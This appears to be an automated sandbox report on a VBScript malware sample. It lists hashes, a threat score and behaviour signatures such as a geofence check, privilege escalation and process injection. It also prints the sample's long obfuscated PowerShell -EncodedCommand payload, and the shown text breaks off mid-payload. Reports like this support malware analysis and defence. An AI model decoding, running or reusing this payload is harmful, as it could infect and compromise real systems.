c4e0600859fa61d7dc76ba1e1792807597c742790ad11523e5f5c3645e3141ed

General

Target

68ed75834368d8bce7fc8d6e85b61727cdb0af1d2446ad3f58f0d5de482bfd26.vbs
Size

257KB
MD5

db5901493340a9ac0de7179ba4f3aada
SHA1

329b62f2a0c30f4dd49cba17f26d9d885ad31651
SHA256

68ed75834368d8bce7fc8d6e85b61727cdb0af1d2446ad3f58f0d5de482bfd26
SHA512

ba86f33318c4be7e04d2a7c5cf7150a60cc47aad92e74e9deab51c6341f06cd9c5c94bf550bcabf3d45ef144eadb9e9b3bd2d0caf3261de93fbb2c9f019727ee
SSDEEP

3072:5PJSdfVKLsi4uYE3I0Gz71h+ZLmJFnnmi4afgmmbYrVf:RSKLsspOdASnEafhmbYrVf

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4316	powershell.exe
4316	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4316	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4280 wrote to memory of 4316	4280	WScript.exe	87
PID 4280 wrote to memory of 4316	4280	WScript.exe	87
PID 4280 wrote to memory of 4316	4280	WScript.exe	87
PID 4316 wrote to memory of 3036	4316	powershell.exe	89
PID 4316 wrote to memory of 3036	4316	powershell.exe	89
PID 4316 wrote to memory of 3036	4316	powershell.exe	89
PID 3036 wrote to memory of 3656	3036	csc.exe	90
PID 3036 wrote to memory of 3656	3036	csc.exe	90
PID 3036 wrote to memory of 3656	3036	csc.exe	90

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\68ed75834368d8bce7fc8d6e85b61727cdb0af1d2446ad3f58f0d5de482bfd26.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4280
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABhAG4AbgB1AGEAbAAgAD0AIABAACcADQAKAEkAcwAkAEYAbwBWAFMAdABpAE0AYQBiAEUAeABlAEgAYQA5AE0AZQAgAEEAbgA9AEIAeQAgAFQAYQAiAEYAbwBWAFAAcgBpAEsAbwByAGYAbwB0AFAAcgB1AEIAZQBhAEgAbwBsAFIAYQBBAEkAdABsAFMAdABsAFMAdQBvAE8AdgBjAEsAbwAiAAoAVAB1AEEATgBvAGQAaQBuAGQAUgBsAC0AQQB1AFQAQQBuAHkAUwBwAHAAVAB2AGUAcgBvACAAUwBhAC0AUwB2AFQAVABpAHkAUwB2AHAAUwBwAGUATQBhAEQARgBpAGUAUABhAGYAQgBsAGkAQQBsAG4AcwB5AGkAVQBuAHQARgBvAGkAUABhAG8ATQBvAG4AUwBuACAAVABlAEAAQQBuACIACgBNAGkAdQBMAHkAcwBQAHIAaQBTAHQAbgBIAGUAZwBhAHUAIABVAG4AUwBlAG4AeQBEAG8AcwBTAHQAdABPAHAAZQBQAGEAbQBVAHAAOwAKAEMAbwB1AE0AaQBzAFUAZABpAEEAbgBuAFMAdABnAFAAcgAgAEIAZQBTAEYAbwB5AFIAZQBzAEcAYQB0AEcAcgBlAEQAbwBtAFIAYQAuAEcAYQBSAEgAbwB1AFAAcgBuAFUAcwB0AEsAdQBpAE0AaQBtAHQAaABlAFMAcAAuAEwAeQBJAFMAaABuAHEAdQB0AEUAYwBlAFIAZQByAEMAbwBvAFMAYwBwAE8AdgBTAEcAbwBlAEYAbwByAEYAbwB2AEIAZQBpAEwAbwBjAEsAYQBlAFAAdQBzAEIAYQA7AAoARABlAHAAVABpAHUARgBvAGIAbQBpAGwASgBlAGkARgBsAGMATQBlACAAVAByAHMAUABlAHQASgBvAGEATwB4AHQAQgBlAGkAQwBlAGMARgBpACAAWQBhAGMAUwBlAGwARwByAGEAVAByAHMAVQBsAHMAQgBlACAAQgB1AFQASAB5AHIAUwBwAGEATQBuAGMATABvAGUATgBhAGEAQwBvAGIARgBoAGkAQgBpADEACgBhAHAAewBGAG8AWwBSAGgARABDAGgAbABNAGkAbABIAHYASQBBAGcAbQBBAG4AcABQAHIAbwBTAGwAcgBPAHAAdABQAGUAKABwAHIAIgBCAG8AdwBHAG8AaQBGAHIAbgBDAG8AbQBCAHIAbQBJAG0ALgBhAGMAZABJAGwAbABOAG8AbABQAGEAIgBDAGgAKQBNAGUAXQBQAGEAcABVAGQAdQBEAGUAYgBOAG8AbABBAGwAaQBIAHYAYwBGAG8AIABzAHEAcwBMAGkAdABBAG4AYQBJAG0AdABzAGUAaQBTAGsAYwBGAGwAIABLAGEAZQBzAGMAeABTAGEAdABzAHYAZQBBAGYAcgBTAGMAbgBTAGMAIABUAHIAaQBGAHIAbgBVAG4AdABKAHUAIABBAG0AdABVAG4AaQBVAGQAbQBBAGEAZQBSAGEARQBDAGUAbgBQAHIAZABTAGEAUABTAGkAZQBUAGkAcgBQAHIAaQBjAG8AbwBJAG4AZABDAGwAKAB0AG8AaQBQAHIAbgBsAGEAdABEAG8AIABVAG4AUwBTAHUAdQBLAGkAYgBjAHUAdABGAGEAKQBGAGwAOwAKAEkAbgBbAFAAcgBEAFUAbABsAHIAZQBsAFAAcgBJAHMAZQBtAFAAYQBwAHUAbgBvAFMAcAByAEIAbAB0AFMAbwAoAE0AaQAiAEEAYwB3AFMAYQBpAEUAbQBuAEYAcgBzAEsAcgBwAFMAZQBvAFMAYQBvAFMAdQBsAG8AdgAuAEMAaQBkAEYAaQByAEUAbQB2AEQAYQAiAEcAYQApAGcAcgBdAFQAaABwAFAAYQB1AEgAeQBiAE0AdQBsAEYAbABpAEIAdQBjAFYAaQAgAHMAdQBzAEsAagB0AGUAawBhAFMAcAB0AFUAbgBpAEgAYQBjAFIAZQAgAEgAZQBlAEIAbwB4AEIAcgB0AEIAbABlAEYAbAByAEYAZQBuAEQAaQAgAEkAbgBpAE8AaQBuAGEAZAB0AEcAcgAgAEgAYQBBAFAAZQBkAHAAcgBkAEIAbwBKAFUAbgBvAEEAZABiAFMAbwAoAFUAbgBpAEQAZQBuAFMAbAB0AFMAcQAgAE8AdgBTAEoAbwBjAFAAdQBpAEkAbgAsAFAAaQBpAE8AdgBuAFUAbgB0AFAAdQAgAEMAbwBJAE0AbwBuAEEAbQBzAFMAawB0AEUAZgByAFQAcgAsAFcAZQBpAEkAbQBuAFMAbgB0AE8AdAAgAEoAbwBNAEEAZgBvAE8AbQBzAE0AbwBrAEkAbwBpAEQAYQAsAFMAdABpAEkAbgBuAFMAaQB0AFIAbwAgAGEAbABTAEsAYQBlAGMAbwByAE4AeQB2AEgAZQBhAE0AYQBuAHAAbwAsAFQAaQBpAFMAdQBuAEMAbAB0AEEAZwAgAFAAbwBMAEcAcgB1AEEAbgBpAFAAcwBzAFQAcgBsAEwAaQBpAEkAbQApAEUAcgA7AAoATQB1AFsAVAByAEQAVABoAGwAQgBpAGwAbwBtAEkATwB2AG0ATwBwAHAARQBsAG8ASgBkAHIASQByAHQAQgBlACgATgB1ACIAYwBvAGcAQwBvAGQAZgByAGkARwBlADMARgBpADIAVQBuACIAUABsACkATwB2AF0AVQBuAHAATAB1AHUASwBsAGIAVAB1AGwAUABvAGkAQwBoAGMARQBuACAAdQBvAHMARwBsAHQAUgBlAGEASwByAHQAUwBsAGkARwBsAGMATwBwACAAQwBhAGUAVABpAHgARABnAHQAcABlAGUAQQBuAHIAQQB2AG4AUABvACAAVABhAGkAcgBvAG4AQQBmAHQAVABlACAAQwBsAEkASABvAG4ARgBsAHYATwBjAGUAcwBvAHIARABhAHQAQgBlAFIAVQBuAGcARAB5AG4AdABhACgATwBiAGkAUABhAG4AUwBpAHQATQBpACAASwBpAEwATAB2AGEAUwBjAG4ATABpAGQAUABvACwAUwBlAGkAUwB1AG4AYQBsAHQAUwBrACAAQQBjAE0ARQB0AGkARwBhAG0AVAB1AG8ATABhACkAVQBuADsACgBFAHIAWwBEAHIARABMAG8AbABMAGEAbABDAG8ASQBFAHMAbQBTAGEAcABFAGsAbwBBAG4AcgBtAG8AdABBAGIAKABTAHQAIgBHAGwAdwBLAG8AaQBDAGgAbgBTAGEAcwBSAGEAcABHAGwAbwBwAGUAbwBFAGYAbABUAGkALgBKAG8AZABVAHIAcgBSAGUAdgBHAHIAIgBEAGUAKQBTAGMAXQBKAGEAcABTAGUAdQB2AGkAYgBzAGsAbABTAG8AaQBSAGUAYwBVAHQAIABTAHUAcwBNAG8AdABTAG8AYQBMAGkAdABTAHUAaQBDAG8AYwBwAGkAIABTAHAAZQBQAGgAeABVAG4AdABLAHUAZQBSAGUAcgBiAGEAbgBGAGoAIABTAGkAaQBFAGQAbgBNAGkAdABCAGUAIABGAG8ARQBVAGQAbgBNAGUAdQBDAG8AbQBBAGkASgBNAHIAbwBDAGEAYgBOAGkAcwBEAG8AKABUAHIAaQBCAG8AbgBCAGwAdABpAGQAIABWAGEAUwBQAGkAaQBTAG4AawBQAG8AawBBAGYALABTAGUAaQBIAGoAbgBBAHYAdABVAGQAIABWAGkARgBHAHUAcgBGAGEAaQBPAGIALABTAHcAaQBDAHIAbgB2AHUAdABCAGUAIABTAHAAUwBNAG8AawBTAGEAcgBTAHUALABHAGUAaQBtAGEAbgBCAGUAdABUAGsAIABLAGEAdwBCAHIAaQBVAG4AbgBEAG8AbgBKAG8ALABFAGwAaQBsAGkAbgBGAG8AdABQAHIAIABNAGkAVQBUAGEAbgBTAGUAbQBQAGwAZQBMAHUAcwBWAGEALABPAHQAaQBQAGwAbgBzAHUAdABDAGgAIABGAGwAbgBDAHUAZQBVAG4AZABVAG4AZwBDAG8ALABFAG0AaQBTAHQAbgBKAGUAdABLAHYAIABPAHYATwBFAG4AcABGAGUAdABCAGkAcgBLAG8AawBVAG4ALABkAG8AaQBKAHUAbgBLAHUAdABGAGkAIABSAGUAUwBDAGwAawBCAGUAeQBkAGcAbABHAGEAKQBPAHYAOwAKAFUAbgBbAEkAbgBEAEMAYQBsAFQAaABsAEsAbwBJAEcAbwBtAEcAbABwAEIAZQBvAEgAYQByAEgAbwB0AHMAawAoAFUAbgAiAEMAcgB1AEQAZQBzAEgAbwBlAEQAcgByAEsAcgAzAEEAbgAyAFMAawAiAEsAYQAsAEEAcAAgAEwAaQBFAEUAagBuAFIAZQB0AFcAaAByAEcAcgB5AEQAbwBQAFUAbgBvAGcAdQBpAEYAeQBuAEIAYQB0AFAAZQA9AEkAbQAiAHMAcABFAFIAZQBuAFAAbwB1AFAAaABtAFMAcQBXAFAAbwBpAEMAdABuAFMAdABkAEMAaABvAEIAZQB3AFMAZQBzAFAAZQAiAEYAaQApAFQAYQBdAEgAbwBwAEQAbwB1AE0AdQBiAFQAcgBsAEYAcgBpAFYAZQBjAEYAbAAgAE8AdgBzAFcAYQB0AFQAcABhAFMAdQB0AEYAbABpAEQAaQBjAG8AaQAgAFIAZABlAEkAbgB4AFAAbAB0AEcAZwBlAFMAdAByAEYAbwBuAFQAaQAgAEIAcgBJAEQAaQBuAEsAdQB0AEsAYQBQAHQAbwB0AHMAawByAEEAZQAgAEQAbwBWAEQAaQBpAEEAbgB0AEQAcgByAEEAbQB1AEwAYgBzAFAAeQBhAFIAZQAzAFQAaQAyAFIAbwAoAFUAbgB1AFMAawBpAGYAYQBuAGcAdQB0AFMAbwAgAE4AbwBWAE4AZQBpAEYAbwBiAEoAYQBlAEUAcgA1AEgAdgAsAFYAbwBpAEQAZQBuAEgAbwB0AFAAaAAgAFMAeQBWAFMAaQBpAGMAZQBiAE8AdgBlAFAAbwA2AEsAbgApAGsAbwA7AAoAQgBvAFsATABhAEQAUwBrAGwARwByAGwAbgBlAEkAQQBzAG0AQgBlAHAAYgBhAG8ATABhAHIARQBrAHQATQBlACgATABpACIAbABvAHcAQgBlAGkATQBlAG4AUAB1AHMAQwBvAHAAVQBuAG8AQwBvAG8ASABhAGwAbAB1AC4AUABoAGQAUwBuAHIAYQBuAHYAUwBlACIATQBvACkAVQBuAF0AcwB0AHAAdQBuAHUARgBsAGIAVQBkAGwAVQBsAGkAQQBuAGMAZABpACAAVQBuAHMATAByAHQATwBwAGEAVABuAHQAcwBrAGkARgBvAGMASABhACAAUgBpAGUAQQBsAHgARwByAHQATwB1AGUASQBuAHIAcgBlAG4ARwB1ACAARgBvAGkAUwB0AG4AUwBuAHQAQQBjACAAVwBpAEUAUwBwAG4ASQBtAHUAUwB2AG0AdQBuAE0AUwB1AG8AQQBpAG4ATwB1AGkAUgBhAHQAVAByAG8AQwBhAHIAVAByAHMATQBhACgAVgBpAGkAawBhAG4AVQBuAHQAUABpACAAVABpAEcATQBvAG4ATgByAG8AVgBhAHMASQBkAHQASQBuACwATABhAGkAUAByAG4AQgBhAHQAQwB0ACAAUwB0AEYATABlAGUAVQBuAHQASgB1AGEATQBvAG8AQQBuAHMAUgBlACwATQBhAGkAUwBrAG4ASQBuAHQARgBvACAAQQByAEMARgBhAGEATABvAGMARgBvAG8ASABpAHoAUAByAGUAQgBlACwAVQBuAGkAVQBsAG4AQQBuAHQAVQBuACAASgBhAGcAVQBkAG8ARwByAGwAQQBnAGQAVABlACwASABhAGkAQgBpAG4AVwBlAHQAQgBlACAAQwBoAEkAVABlAG0AUABhAG0ASwBqAG8ATQBvACwAQQBmAGkATAB1AG4ATAB1AHQARABhACAAVQBuAFAARQBuAGUAQQBsAHMAUgBhAHQAQQByACkATwB2ADsACgBEAGUAWwBTAGUARABGAGkAbABCAGkAbABWAGEASQBFAGsAbQBGAHIAcABKAGUAbwBUAG8AcgBGAG8AdABMAGUAKABVAG4AIgBUAGkAawBCAHIAZQBDAGgAcgBUAGEAbgBTAGsAZQBTAGsAbABOAGEAMwBHAGwAMgBBAGcAIgBNAGUAKQBSAHUAXQBGAHUAcABEAGsAdQBTAHQAYgBhAGsAbABUAGgAaQBTAGsAYwBPAHAAIABDAHIAcwBXAG8AdABTAGUAYQBBAGMAdABOAGEAaQBSAGEAYwBiAHUAIABSAGUAZQBGAGUAeABNAGUAdABXAG8AZQBGAGEAcgBIAGoAbgBVAGQAIABIAGUAdgBTAGMAbwBTAGUAaQBTAHQAZABSAGEAIABIAGEAUgBIAGUAdABLAG8AbABCAGwATQBNAGkAbwBiAGwAdgBEAGkAZQBCAGUATQBNAHUAZQBoAHUAbQBCAHIAbwBMAHMAcgBPAHYAeQBIAG8AKABTAGsASQBEAGEAbgB2AG8AdABNAG8AUABTAHQAdABGAG8AcgBQAHIAIABEAGQAVgBEAGUAaQBGAG8AYgBGAGwAZQBTAGIAMQBOAGUALABPAHAAcgBQAG8AZQBTAGUAZgBMAG8AIABrAG8ASQBIAHUAbgBTAHQAdABUAHkAMwBMAHUAMgBLAGoAIABCAGkAVgBGAG8AaQBTAGkAYgBHAHIAZQBTAG4AMgBzAHQALABUAG4AaQBIAGUAbgBVAG4AdABGAG8AIABzAGsAVgBJAG4AaQBCAGEAYgBBAGYAZQBhAGQAMwBXAGUAKQBkAGUAOwAKAGQAbwBbAFcAYQBEAEEAbgBsAEYAcgBsAHUAbgBJAFQAZQBtAFAAbABwAE0AaQBvAEEAdQByAEsAYQB0AHQAcgAoAEgAYQAiAEgAdQBjAFMAZQBvAE8AbABtAE0AeQBkAE8AYgBsAFIAdQBnAFMAaQAzAEMAYQAyAFIAYQAuAE0AYQBkAE4AdQBsAEsAcgBsAEgAZQAiAEgAeQApAFUAbgBdAFQAdQBwAFQAeQB1AFAAcwBiAEcAZQBsAE4AZQBpAFQAcgBjAFQAZQAgAFQAZQBzAEMAdQB0AE0AaQBhAHUAbgB0AFUAbgBpAE8AdgBjAFUAbgAgAEsAbwBlAEYAYQB4AFMAdgB0AEsAbgBlAEgAawByAEkAbgBuAEkAbAAgAEkAbgBpAHQAcgBuAFMAYwB0AFAAYQAgAEsAbABHAFMAYQBlAEEAbgB0AEIAcgBGAFAAeQBpAEsAbwBsAEgAbwBlAE0AYQBUAFMAdQBpAEUAdAB0AE0AZQBsAFQAbwBlAFIAaQAoAFMAcABpAE4AaQBuAFIAZQB0AE0AbwAgAHMAbwBIAEQAbwBvAFUAbgB2AEIAZQBlAFQAcgBkAEIAcgAsAFIAZQBpAFAAYQBuAE0AYQB0AEsAdQAgAFQAYQBFAFcAaQBrAFcAZQBzAFMAYQBlAEgAagBnAFMAdABlAEIAbAAsAFMAdABpAFUAbgBuAEYAbAB0AEQAaQAgAEUAYwBFAEIAYQBzAEEAdQBtAFIAYQApAFYAYQA7AAoASgBvAFsAVQBuAEQAUAByAGwARAB5AGwAQQBtAEkAUABpAG0AUgBvAHAARQBrAG8ATABhAHIARQBrAHQAUAB1ACgAWgBhACIARABpAGsAUwBrAGUAQgBpAHIATgBvAG4ASQBjAGUAVQBuAGwARgByADMATwBwADIAQwBvACIAUwBuACkAVABhAF0AdgByAHAAQgBpAHUARgBvAGIAVwBpAGwATQBhAGkAUwB5AGMASABvACAAQQBhAHMASwBsAHQATQBvAGEAUwB0AHQATgBvAGkAawBvAGMATQBlACAAcwBhAGUAUwB0AHgAVQBuAHQAVABhAGUAQQBjAHIASwBsAG4AcwB5ACAASgBvAHYATQBnAG8AdABlAGkAdQBzAGQAdABhACAAQQBlAFMAQQB1AGUAZwBhAHQAQgB5AEYAbwB2AGkARgBhAGwAQgBlAGUAVQBuAEEAUwB2AHAAZgBsAGkAVgBpAHMAQwBhAFQATABpAG8AUABhAEEAUABoAE4AUgBlAFMAaQBzAEkAUABhACgAVQBuACkARQBnADsACgBGAGkAWwBBAGwARABTAHAAbABDAG8AbABTAG4ASQBVAHIAbQBJAGMAcABBAHMAbwBDAHUAcgBiAGwAdABIAHUAKABBAHIAIgBMAGEAZwBQAHIAZABQAGgAaQBrAHIAMwBTAHQAMgBJAG4AIgBVAGQAKQBCAGwAXQBCAHUAcABOAG8AdQBUAG8AYgBMAGkAbABMAGEAaQBSAGUAYwBTAGsAIABTAGUAcwBBAHIAdABIAG8AYQBhAHAAdABSAGUAaQBQAG8AYwBBAHAAIABTAGgAZQBBAGIAeABPAHgAdABCAGEAZQBUAGUAcgBMAGEAbgBJAG4AIABPAHAAaQBCAGwAbgBTAHAAdABsAGEAIABFAG4AUwBEAGUAZQBCAGEAdABHAHIAUwBCAG8AdABNAG8AcgBoAGUAZQBVAGQAdABaAHkAYwBEAHkAaABzAGkAQgBFAG4AbABSAGUAdABVAG4ATQBTAHQAbwBLAG8AZABNAGUAZQBMAGkAKABCAHIAaQBMAG8AbgBQAHMAdABTAHQAIABPAG4ARwBTAHAAcgBVAG4AZQBSAGEALABWAGEAaQB0AHIAbgBQAGEAdABQAHIAIABTAHQAcgBEAG8AbwBSAGUAbgBGAG8AZABQAGUAZQBQAHIAKQBTAHAAOwAKAFcAYQBbAFAAcgBEAE8AdQBsAE8AcABsAFMAaQBJAEgAZQBtAFoAbwBwAFMAaABvAG8AdgByAHAAbwB0AFUAbgAoAE0AeQAiAEEAZAB1AEwAYQBzAE4AcwBlAEUAZwByAFQAaQAzAFIAaQAyAFMAaQAiAFMAdQApAEsAbwBdAEYAaQBwAEsAYQB1AEIAbABiAE8AYwBsAE0AaQBpAFUAbgBjAFAAYQAgAFIAZQBzAEEAYwB0AFYAYQBhAEUAbgB0AFAAbwBpAEMAbwBjAFIAbgAgAFYAaQBlAFQAZQB4AFQAYQB0AE4AbwBlAEgAZQByAHMAZQBuAEMAaAAgAFQAcgBpAFUAbgBuAEMAdQB0AEgAZQAgAHQAbwBHAEkAbgBlAEQAbwB0AEIAYQBXAFUAbgBpAFAAcgBuAEQAcgBkAEkAbgBvAFMAdQB3AFMAdABDAEUAbgBvAGIAcgBuAEIAZQB0AEIAZQBlAE0AZQB4AFUAbgB0AFIAZQBIAEIAbwBlAE4AYQBsAFMAdABwAE8AZgBJAFQAaQBkAFMAeQAoAFAAcgBpAGYAbwBuAEgAZQB0AEUAZAAgAEYAYQBTAFUAZABuAFIAZQBkAEEAYgBlAEIAbwByAE8AcABrAEEAcwAyAE4AbwAyAEEAZgA2AEgAZQApAFMAcAA7AAoATQBkAFsARwBsAEQARgBhAGwAUwB0AGwAWQBhAEkARgBvAG0ARABhAHAATQBlAG8AUwBpAHIAQgBvAHQARABvACgAUwB5ACIARABpAHUAUABhAHMARwByAGUAUwBhAHIAQQBmADMASABzADIARAByACIAVAB2ACkAQgBlAF0AUwB1AHAAQgBlAHUATgBvAGIATQBpAGwAQQBtAGkAWABhAGMASQBzACAASABqAHMAUwB5AHQAQgBsAGEATgBlAHQAQwBhAGkAUgBpAGMARABlACAAUABhAGUASwBlAHgAVABpAHQAUwBhAGUARgBvAHIASQBuAG4AWQBlACAAQwBvAGkAUwB5AG4AQQB1AHQAVgBlACAASwB1AEcARAByAGUAVgBpAHQAUwBsAFcAcgBlAGkATgBvAG4ATABuAGQATQB5AG8AQQBwAHcASABpAFQAdAByAGUAQQBzAHgATwByAHQAUwB5AEwATQBhAGUAUABhAG4AVQBuAGcAUwBwAHQAQQBuAGgARgBlACgAQQBmAGkARAB5AG4ARABlAHQASwB5ACAAUwB1AE8ASQBwAHUAUwBwAHQAQQBmAHMASQBmACkAQgB1ADsACgBTAGkAWwBPAHAARABUAGUAbABzAGgAbABGAG8ASQBCAHIAbQBTAGwAcABiAGEAbwBJAG4AcgBQAHIAdABtAG8AKABJAG4AIgBTAGMAdwBTAGsAaQBMAG8AbgBUAGUAbQBuAG8AbQBTAGMALgBPAG0AZABBAG0AbABOAG8AbAB0AGoAIgBTAG8AKQBTAGsAXQBTAHQAcABmAHUAdQBDAGEAYgBuAG8AbABNAGUAaQBCAGUAYwBQAHIAIABQAHMAcwBSAGUAdABVAGsAYQBMAHUAdABPAHYAaQBUAHIAYwBQAGEAIABWAGEAZQBTAGsAeABBAHUAdABTAGEAZQBQAGgAcgBhAG4AbgBTAGMAIABJAG8AaQBVAG4AbgBOAG8AdABTAGUAIABBAHIAbQBCAHUAaQBPAG0AZABIAG8AaQBLAG8ASQBDAHkAbgBGAHIATwBEAGUAcABBAGMAZQBTAHYAbgBEAGUAKABTAG0AaQBiAGUAbgBGAHIAdABCAGUAIABNAGkASwBTAGUAbABTAGEAZQBzAGsAdgBNAGUAbwBTAGUALABCAGwAaQBCAGEAbgBKAGEAdABCAG8AIABTAHkAUwBHAHUAcABDAG8AdABCAG8AbQBUAGUAZQBLAG8AagBLAHIALABBAG4AaQBTAG0AbgBCAGEAdABiAGEAIABWAGUAQgBTAHkAaQBDAG8AYgBBAG4AbABNAGEAaQBQAGEALABTAHQAaQBPAGIAbgBHAHIAdABEAGUAIABSAGUAUwBJAG0AZQBUAGUAbABQAGEAZQBTAGYAdABUAGEAYQBUAGgALABDAHIAaQBJAG4AbgBVAHAAdABQAGUAIABVAGQAbQBEAGkAdQBTAHcAbABUAG8AZQBBAGMAKQBDAGgAOwAKAEMAaABbAEsAYQBEAEYAbABsAEgAZQBsAEEAZgBJAEEAcgBtAFQAcgBwAEwAaQBvAFMAdAByAEYAcgB0AEYAcgAoAEMAeQAiAEYAbABrAFAAcgBlAEEAcgByAFMAdABuAEgAagBlAE4AZQBsAEgAbQAzAFYAbwAyAFAAYQAiAG4AcgAsAEcAcgAgAG0AZQBFAE0AeQBuAE8AdgB0AE8AdgByAE4AbwB5AEUAcgBQAEMAeQBvAEcAbABpAEgAeQBuAFAAcgB0AFUAaQA9AE0AaQAiAEMAcgAkAEMAYQBWAFMAdABpAFIAZQBiAG8AZQBlAEMAbwA5AEYAaQAiAEQAZQApAG4AbwBdAFIAZQBwAEcAZwB1AEkAbgBiAFUAbgBsAFUAZABpAEoAdQBjAEkAbgAgAGkAbgBzAFAAbwB0AGEAaABhAEEAYgB0AEEAbABpAEUAawBjAEgAbwAgAFYAYQBlAEgAZQB4AEMAbwB0AFMAcABlAEsAbwByAEwAaQBuAFMAawAgAEwAeQBpAEQAZABuAEIAbAB0AFUAdgAgAEYAaQBUAEEAcgBFAFMAbABMAEsAbwBPAFoAeQAoAEQAcgBpAGsAagBuAEQAaQB0AFMAdQAgAE8AcgBUAEYAbwByAEsAbwBhAEQAZQBjAE8AcABlAEIAbABhAHYAaQBiAFUAZABpAFAAYQA2AFYAYQAsAEwAdQAgAFQAbwBpAE4AbwBuAEsAYQB0AFUAZAAgAE0AbwBKAFMAawBvAFAAbwBpAEEAbgBuAFAAYQB0AEYAbABsAEIAZQB5AEkAbgBzAGQAdQBwAEIAZQAsAEsAYQBpAFMAYQBuAEQAaQB0AEYAbwAgAEgAYQBWAE4AbwBpAFMAdABiAEYAaQBlAFMAZQAsAEIAbAAgAFIAZQBpAEgAbwBuAE8AcgB0AE4AbwAgAEYAcgBUAEcAdQByAFQAcgBhAGgAYQBjAFoAZQBlAGEAZwBhAFAAYQBiAEYAbwBpAFYAYQApAE8AcAA7AAoAVQBuAH0ACgBSAGUAIgBBAG4AQAAKAEEAbgAkAEQAZQBUAEcAbwByAFUAZABhAEEAbgBjAEYAbABlAE4AbwBhAEcAcgBiAFQAaQBpAEMAYQAzAEYAbwA9AGQAaQBbAFcAbwBUAEIAbAByAHMAawBhAEwAZQBjAHAAbABlAEcAcgBhAGEAZgBiAEcAbwBpAEIAYQAxAFMAdQBdAE0AaQA6AEYAbwA6AEEAYwBUAFMAdQBFAFYAZQBMAEMAaQBPAFMAcQAoAEYAbwAwAE8AdQAsAFAAYQAxAFUAbgAwAFUAbgA0AEoAbwA4AFMAbQA1AEUAeAA3AEQAaQA2AEgAbwAsAFUAZAAxAFMAbgAyAFAAcwAyAFYAYQA4AEQAcgA4AEUAbQAsAEcAYQA2AEIAbAA0AEMAbwApAAoAVQBmACQARgBuAEwATQBjAHkASAB1AHMAUwBsAG8AUwB0AHMAcgBlAG8AcwB0AG0ATQBhAGUAUwBwAHUAVQByAD0ATQByACgAcgBlAEcAUABhAGUAQgBlAHQATABpAC0AZABlAEkAUABoAHQAWQBhAGUAUwBlAG0AUwB5AFAAQwBvAHIAQQBmAG8AUwB0AHAAQQBnAGUAQQBnAHIASwB2AHQAVAByAHkARgBvACAAQQBmAC0AdAByAFAAUAByAGEATwBiAHQAQQBpAGgAUwBwACAAUwB0ACIATABhAEgAcwB1AEsAUQB1AEMAVQBuAFUAUwBwADoAUgBlAFwATQBhAFMAcwBuAG8AZABkAGYAUwB0AHQAUwB1AHcARwBhAGEAUAByAHIAQgBsAGUAUQB1AFwAQQB1AFIATwB2AHUAUABpAG4ATQBhAG4ATgBvAGkAQgByAG4ASQBuAGcATgBvAGkAUgBlAG4ATABlACIASwBuACkATQBlAC4AVAByAEwASABhAGUARgBsAGcAUgBvAGEASABlAGwAUwB1AGkAUwBwAHMAUABhAGEAQgBhAHQACgBJAG4AJABHAHIATABBAGIAYQBHAHIAcwBTAHAAcwBTAHkAbwBCAGEAIABDAGgAPQBFAHgAIABUAGEAWwBVAG4AUwBNAGEAeQBJAG4AcwBkAGUAdABkAGUAZQBkAHIAbQBTAGgALgBjAGEAQgBUAGUAeQBFAG4AdABRAHUAZQBEAGUAWwBBAGIAXQBMAGkAXQBNAGEAOgBaAGkAOgBHAGEAQwBFAG4AcgBDAHkAZQBTAG0AYQBNAG8AdABUAGUAZQBTAHQASQBGAHIAbgBSAG8AcwBEAGUAdABQAHIAYQBEAHkAbgBIAHkAYwBNAGEAZQBCAG8AKABGAGwAWwBEAG8AUwBDAGgAeQBIAG8AcwBHAGUAdABBAGQAZQBVAG4AbQBIAG8ALgBMAGQAQgBGAG8AeQBQAHIAdABEAHIAZQBkAHUAXQBTAGkALABLAG8AJABFAG4ATABTAGsAeQBIAGEAcwBSAGUAbwBwAG8AcwBuAGkAbwBTAHkAbQBwAHIAZQBTAHUAdQBTAHUALgBIAGkATABOAG8AZQBSAGUAbgBEAHIAZwBvAHYAdABBAGQAaABUAGkAIABEAGUALwBQAGgAIAB3AGgAMgBUAG8AKQAKAEMAdQBGAGIAaQBvAFMAYQByAEsAbAAoAE0AYQAkAE0AbwBpAFMAcAA9AEYAaQAwAEkAbgA7AFMAdQAgAE4AZAAkAEEAZABpAEEAawAgAE8AdwAtAEwAaQBsAFQAdgB0AFYAbwAgAFYAaQAkAEYAbwBMAEMAaAB5AFMAdQBzAE8AZgBvAFcAYQBzAFQAaQBvAEMAeQBtAFQAYQBlAEQAZQB1AHIAZQAuAEgAagBMAEEAZgBlAEIAYQBuAE0AYQBnAGgAYQB0AEEAdABoAEcAZQA7AFMAaAAgAFAAcwAkAEMAbwBpAFAAZQArAE0AZQA9AFUAbgAyAGsAcgApAAoAYQBmAHsACgBCAHUACQBTAGMAJABCAHIATABPAG0AYQB3AHIAcwBQAGUAcwBoAGoAbwBVAGQAWwBPAG0AJABQAGgAaQBCAGUALwBBAG4AMgBQAGwAXQBVAG4AIABIAGUAPQBGAHUAIABFAHIAWwBCAHIAYwBEAGUAbwBOAGEAbgBDAHQAdgBIAHUAZQByAGUAcgBNAG8AdABpAG4AXQBBAGcAOgBUAHIAOgBCAHIAVABIAGoAbwBTAHIAQgBkAGkAeQBSAGUAdABWAGkAZQBMAGEAKABrAG8AJABUAHIATABMAG8AeQBPAHIAcwBhAGYAbwBEAGkAcwBQAGEAbwBTAGUAbQBVAHIAZQBHAGEAdQBCAGUALgBQAHkAUwBHAHIAdQBOAHIAYgBNAGEAcwBPAG0AdABUAHQAcgBSAGEAaQBMA